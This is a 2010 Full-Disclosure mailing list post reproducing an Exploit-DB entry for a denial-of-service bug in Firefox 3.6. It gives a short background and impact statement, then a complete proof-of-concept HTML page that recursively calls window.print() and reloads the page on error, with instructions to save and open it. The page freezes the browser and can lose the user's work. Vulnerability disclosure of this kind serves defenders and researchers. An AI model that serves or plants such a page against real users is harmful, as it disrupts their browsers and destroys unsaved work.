[Full-disclosure] Mozilla Firefox 3.6 (Multitudinous looping )Denial of Service Exploit



http://www.exploit-db.com/exploits/11432



# Title: Mozilla Firefox 3.6 (Multitudinous looping )Denial of Service
Exploit
# EDB-ID: 11432
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Asheesh kumar Mani Tripathi
# Published: 2010-02-13
# Verified: yes
# Download Exploit Code <http://www.exploit-db.com/download/11432>
# Download N/A

view source <http://www.exploit-db.com/exploits/11432#viewSource>
print <http://www.exploit-db.com/exploits/11432#printSource>?<http://www.exploit-db.com/exploits/11432#about>

=======================================================================

Mozilla Firefox 3.6 (Multitudinous looping )Denial of
Service Exploit

=======================================================================

by

Asheesh Kumar Mani Tripathi


# code by Asheesh kumar Mani Tripathi

# email informationhacker08@xxxxxxxxx

# company aksitservices

# Credit by Asheesh Anaconda


#Download www.mozilla.com/firefox


#Background

Mozilla Firefox is a popular internet browser. .....:)

#Vulnerability
This bug is a typical result of multitudinous loop.
The flaw exists when the attacker put window.printer() funtion
in multitudinous loop.User interaction is required to
exploit this vulnerability in that the target must visit a malicious
web page.


#Impact
Browser doesn't respond any longer to any user input, all tabs are no
longer accessible, your work if any might be lost.



#Proof of concept
copy the code in text file and save as "asheesh.html" open in Mozilla
Firefox

========================================================================================================================

asheesh.html
========================================================================================================================

<html>
<title>asheesh kumar mani tripathi</title>

<script>


function
asheesh()
{
window.onerror=new Function("history.go(0)");
window.print();
asheesh();


}
asheesh();
</script>

</html>

========================================================================================================================


#If you have any questions, comments, or concerns, feel free to contact me.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Relevant Pages